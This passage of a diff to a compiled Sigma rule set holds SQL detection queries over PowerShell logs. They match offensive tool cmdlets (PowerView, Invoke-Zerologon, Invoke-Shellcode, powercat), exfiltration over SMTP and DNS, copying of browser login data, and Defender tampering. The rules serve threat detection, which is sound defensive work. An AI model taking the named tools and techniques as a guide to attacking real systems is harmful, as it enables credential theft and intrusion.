'%Invoke-PowerShellTCP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSInject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RunAs%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Invoke-SauronEye%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SCShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Sharp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StandIn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tater%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Whisker%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WireTap%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR ScriptBlockText LIKE '%MailRaider%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ADIDNSNode%' ESCAPE 
'\\' OR ScriptBlockText LIKE '%New-DNSRecordArray%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-HoneyHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-InMemoryModule%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-SOASerialNumberArray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Minidump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Port-Scan%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerBreach%' ESCAPE '\\' OR ScriptBlockText LIKE '%powercat %' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerUp%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerView%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Rename-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Revoke-ADIDNSPermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MacAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MachineAccountAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Wallpaper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Show-TargetScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-CaptureServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR ScriptBlockText LIKE '%VolumeShadowCopyTools%' ESCAPE '\\') AND NOT (((ScriptBlockText LIKE '%Get-SystemDriveInfo%' ESCAPE '\\' OR ScriptBlockText LIKE '%C:\\\\ProgramData\\\\Amazon\\\\EC2-Windows\\\\Launch\\\\Module\\\\%' ESCAPE '\\'))))" ], - "filename": "posh_ps_psasyncshell.yml" + "filename": "posh_ps_malicious_commandlets.yml" }, { - "title": "Add New Windows Capability - ScriptBlock", - "id": "155c7fd5-47b4-49b2-bbeb-eb4fab335429", + "title": "Powershell Exfiltration Over SMTP", + "id": "9a7afa56-4762-43eb-807d-c3dc9ffe211b", "status": "experimental", - "description": "Detects usage of the \"Add-WindowsCapability\" cmdlet to add new windows capabilities. 
Notable capabilities could be \"OpenSSH\" and others.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\nThe data may also be sent to an alternate network location from the main command and control server.\n", + "author": "frack113", "tags": [ - "attack.execution" + "attack.exfiltration", + "attack.t1048.003" ], "falsepositives": [ - "Legitimate usage of the capabilities by administartors or users. Filter accordingly" + "Legitimate script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-WindowsCapability %' ESCAPE '\\' AND ScriptBlockText LIKE '%OpenSSH.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ScriptBlockText LIKE '%Send-MailMessage%' ESCAPE '\\' AND NOT (ScriptBlockText LIKE '%CmdletsToExport%' ESCAPE '\\'))" ], - "filename": "posh_ps_add_windows_capability.yml" + "filename": "posh_ps_send_mailmessage.yml" }, { - "title": "Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging", - "id": "ae2bdd58-0681-48ac-be7f-58ab4e593458", + "title": "Suspicious FromBase64String Usage On Gzip Archive - Ps Script", + "id": "df69cb1d-b891-4cd9-90c7-d617d90100ce", "status": "experimental", - "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects attempts of decoding a base64 Gzip archive in a PowerShell script. 
This technique is often used as a method to load malicious content into memory afterward.", + "author": "frack113", + "falsepositives": [ + "Legitimate administrative script" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%FromBase64String%' ESCAPE '\\' AND ScriptBlockText LIKE '%MemoryStream%' ESCAPE '\\' AND ScriptBlockText LIKE '%H4sI%' ESCAPE '\\')" + ], + "filename": "posh_ps_frombase64string_archive.yml" + }, + { + "title": "Potential Active Directory Enumeration Using AD Module - PsScript", + "id": "9e620995-f2d8-4630-8430-4afd89f77604", + "status": "experimental", + "description": "Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dl\" DLL. Which is often used by attackers to perform AD enumeration.", + "author": "frack113, Nasreddine Bencherchali", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.reconnaissance", + "attack.discovery", + "attack.impact" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Legitimate use of the library for administrative activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR ScriptBlockText LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Import-Module %' ESCAPE '\\' AND ScriptBlockText 
LIKE '%Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\') OR ScriptBlockText LIKE '%ipmo Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\'))" ], - "filename": "posh_ps_tamper_defender_remove_mppreference.yml" + "filename": "posh_ps_active_directory_module_dll_import.yml" }, { - "title": "Clearing Windows Console History", - "id": "bde47d4b-9987-405c-94c7-b080410e8ea7", + "title": "Access to Browser Login Data", + "id": "fc028194-969d-4122-8abe-0470d5b8f12f", "status": "test", - "description": "Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.", - "author": "Austin Songer @austinsonger", + "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.\nWeb browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.\nWeb browsers typically store the credentials in an encrypted format within a credential store.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1070.003" + "attack.credential_access", + "attack.t1555.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Clear-History%' ESCAPE '\\' OR ((ScriptBlockText LIKE '%Remove-Item%' ESCAPE '\\' OR ScriptBlockText LIKE '%rm%' ESCAPE '\\') AND (ScriptBlockText LIKE '%ConsoleHost\\_history.txt%' ESCAPE '\\' OR ScriptBlockText LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Copy-Item%' ESCAPE '\\' AND ScriptBlockText LIKE 
'%-Destination%' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Opera Software\\\\Opera Stable\\\\Login Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Mozilla\\\\Firefox\\\\Profiles%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Microsoft\\\\Edge\\\\User Data\\\\Default%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data For Account%' ESCAPE '\\'))" ], - "filename": "posh_ps_clearing_windows_console_history.yml" + "filename": "posh_ps_access_to_browser_login_data.yml" }, { - "title": "Security Software Discovery by Powershell", - "id": "904e8e61-8edf-4350-b59c-b905fc8e810c", - "status": "test", - "description": "Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment.\nThis may include things such as firewall rules and anti-viru\n", + "title": "PowerShell WMI Win32_Product Install MSI", + "id": "91109523-17f0-4248-a800-f81d9e7c081d", + "status": "experimental", + "description": "Detects the execution of an MSI file using PowerShell and the WMI Win32_Product class", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1518.001" + "attack.defense_evasion", + "attack.t1218.007" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%get-process%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Description%' ESCAPE '\\' AND ScriptBlockText LIKE '%-like%' ESCAPE '\\' AND (ScriptBlockText LIKE '%\"%virus%\"%' ESCAPE '\\' OR ScriptBlockText LIKE '%\"%carbonblack%\"%' ESCAPE '\\' OR ScriptBlockText LIKE '%\"%defender%\"%' ESCAPE '\\' OR ScriptBlockText LIKE '%\"%cylance%\"%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' 
AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Invoke-CimMethod %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName %' ESCAPE '\\' AND ScriptBlockText LIKE '%Win32\\_Product %' ESCAPE '\\' AND ScriptBlockText LIKE '%-MethodName %' ESCAPE '\\' AND ScriptBlockText LIKE '%.msi%' ESCAPE '\\')" ], - "filename": "posh_ps_security_software_discovery.yml" + "filename": "posh_ps_win32_product_install_msi.yml" }, { - "title": "PowerShell ADRecon Execution", - "id": "bf72941a-cba0-41ea-b18c-9aca3925690d", + "title": "PowerShell Remote Session Creation", + "id": "a0edd39f-a0c6-4c17-8141-261f958e8d8f", "status": "experimental", - "description": "Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7", - "author": "Bhabesh Raj", + "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system\n", + "author": "frack113", "tags": [ - "attack.discovery", "attack.execution", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Legitimate administrative script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Function Get-ADRExcelComOb%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRDomainController%' ESCAPE '\\' OR ScriptBlockText LIKE '%ADRecon-Report.xlsx%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-PSSession%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComputerName %' ESCAPE '\\')" ], - "filename": "posh_ps_adrecon_execution.yml" + "filename": 
"posh_ps_remote_session_creation.yml" }, { - "title": "Powershell Suspicious Win32_PnPEntity", - "id": "b26647de-4feb-4283-af6b-6117661283c5", - "status": "test", - "description": "Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.", + "title": "Potential In-Memory Execution Using Reflection.Assembly", + "id": "ddcd88cb-7f62-4ce5-86f9-1704190feb0a", + "status": "experimental", + "description": "Detects usage of \"Reflection.Assembly\" load functions to dynamically load assemblies in memory", "author": "frack113", + "falsepositives": [ + "Legitimate use of the library" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Reflection.Assembly]::load%' ESCAPE '\\')" + ], + "filename": "posh_ps_dotnet_assembly_from_file.yml" + }, + { + "title": "PowerShell Credential Prompt", + "id": "ca8b77a9-d499-4095-b793-5d5f330d450e", + "status": "test", + "description": "Detects PowerShell calling a credential prompt", + "author": "John Lambert (idea), Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1120" + "attack.credential_access", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Admin script" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Win32\\_PnPEntity%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PromptForCredential%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_win32_pnpentity.yml" + "filename": "posh_ps_prompt_credentials.yml" }, { - "title": "Suspicious SSL Connection", - "id": 
"195626f3-5f1b-4403-93b7-e6cfd4d6a078", + "title": "Request A Single Ticket via PowerShell", + "id": "a861d835-af37-4930-bcd6-5b178bfb54df", "status": "test", - "description": "Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol.", + "description": "utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer.\nThis behavior is typically used during a kerberos or silver ticket attack.\nA successful execution will output the SPNs for the endpoint in question.\n", "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1573" + "attack.credential_access", + "attack.t1558.003" ], "falsepositives": [ - "Legitimate administrative script" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.Net.Security.SslStream%' ESCAPE '\\' AND ScriptBlockText LIKE '%Net.Security.RemoteCertificateValidationCallback%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AuthenticateAsClient%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.IdentityModel.Tokens.KerberosRequestorSecurityToken%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_ssl_keyword.yml" + "filename": "posh_ps_request_kerberos_ticket.yml" }, { - "title": "Potential WinAPI Calls Via PowerShell Scripts", - "id": "03d83090-8cba-44a0-b02f-0b756a050306", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell", + "id": "e54f5149-6ba3-49cf-b153-070d24679126", "status": "experimental", - "description": "Detects use of WinAPI Functions in PowerShell scripts", - "author": "Nikita Nazarov, oscd.community, Tim 
Shelton", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1059.001", - "attack.t1106" + "attack.t1059.001" ], "falsepositives": [ - "Carbon PowerShell Module (https://github.com/webmd-health-services/Carbon)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%AddSecurityPackage%' ESCAPE '\\' OR ScriptBlockText LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR ScriptBlockText LIKE '%Advapi32%' ESCAPE '\\' OR ScriptBlockText LIKE '%CloseHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateProcessWithToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateRemoteThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateUserThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%DangerousGetHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%DuplicateTokenEx%' ESCAPE '\\' OR ScriptBlockText LIKE '%EnumerateSecurityPackages%' ESCAPE '\\' OR ScriptBlockText LIKE '%FreeLibrary%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetDelegateForFunctionPointer%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetLogonSessionData%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetModuleHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetProcAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetProcessHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetTokenInformation%' ESCAPE '\\' OR ScriptBlockText LIKE '%ImpersonateLoggedOnUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%kernel32%' ESCAPE '\\' OR ScriptBlockText LIKE '%LoadLibrary%' ESCAPE '\\' OR ScriptBlockText LIKE '%memcpy%' ESCAPE '\\' OR ScriptBlockText LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%msvcrt%' ESCAPE '\\' OR ScriptBlockText LIKE '%ntdll%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenDesktop%' 
ESCAPE '\\' OR ScriptBlockText LIKE '%OpenProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenProcessToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenThreadToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenWindowStation%' ESCAPE '\\' OR ScriptBlockText LIKE '%QueueUserApc%' ESCAPE '\\' OR ScriptBlockText LIKE '%ReadProcessMemory%' ESCAPE '\\' OR ScriptBlockText LIKE '%RevertToSelf%' ESCAPE '\\' OR ScriptBlockText LIKE '%RtlCreateUserThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%secur32%' ESCAPE '\\' OR ScriptBlockText LIKE '%SetThreadToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%VirtualAlloc%' ESCAPE '\\' OR ScriptBlockText LIKE '%VirtualFree%' ESCAPE '\\' OR ScriptBlockText LIKE '%VirtualProtect%' ESCAPE '\\' OR ScriptBlockText LIKE '%WaitForSingleObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%WriteInt32%' ESCAPE '\\' OR ScriptBlockText LIKE '%WriteProcessMemory%' ESCAPE '\\' OR ScriptBlockText LIKE '%ZeroFreeGlobalAllocUnicode%' ESCAPE '\\') AND NOT ((ScriptBlockText LIKE '# Copyright 2016 Amazon.com, Inc. 
or its affiliates.%' ESCAPE '\\' AND ScriptBlockText LIKE '%function Import-SerialPortUtil %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" ], - "filename": "posh_ps_accessing_win_api.yml" + "filename": "posh_ps_invoke_obfuscation_via_var.yml" }, { - "title": "Powershell DNSExfiltration", - "id": "d59d7842-9a21-4bc6-ba98-64bfe0091355", - "status": "test", - "description": "DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel", - "author": "frack113", + "title": "Invoke-Obfuscation STDIN+ Launcher - Powershell", + "id": "779c8c12-0eb1-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.exfiltration", - "attack.t1048" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate script" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Invoke-DNSExfiltrator%' ESCAPE '\\' OR (ScriptBlockText LIKE '% -i %' ESCAPE '\\' AND ScriptBlockText LIKE '% -d %' ESCAPE '\\' AND ScriptBlockText LIKE '% -p %' ESCAPE '\\' AND ScriptBlockText LIKE '% -doh %' ESCAPE '\\' AND ScriptBlockText LIKE '% -t %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$?\\{?input\\}?|noexit).+\"')" ], - "filename": "posh_ps_invoke_dnsexfiltration.yml" + "filename": "posh_ps_invoke_obfuscation_stdin.yml" }, { - "title": "Malicious PowerView 
PowerShell Commandlets", - "id": "dcd74b95-3f36-4ed9-9598-0490951643aa", + "title": "Registry-Free Process Scope COR_PROFILER", + "id": "23590215-4702-4a70-8805-8dc9e58314a2", "status": "test", - "description": "Detects Commandlet names from PowerView of PowerSploit exploitation framework.", - "author": "Bhabesh Raj", + "description": "Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR.\nThe COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR).\nThese profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.\n(Citation: Microsoft Profiling Mar 2017)\n(Citation: Microsoft COR_PROFILER Feb 2013)\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1574.012" ], "falsepositives": [ - "Should not be any as administrators do not use this tool" + "Legitimate administrative script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-DomainGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-DomainObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-ADName%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-NameToSid%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-SID%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainLocalGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Find-DomainProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DFSshare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSRecord%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSZone%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Domain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Forest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetComputer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetFileServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetForest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetOU%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSite%' ESCAPE '\\' OR ScriptBlockText LIKE 
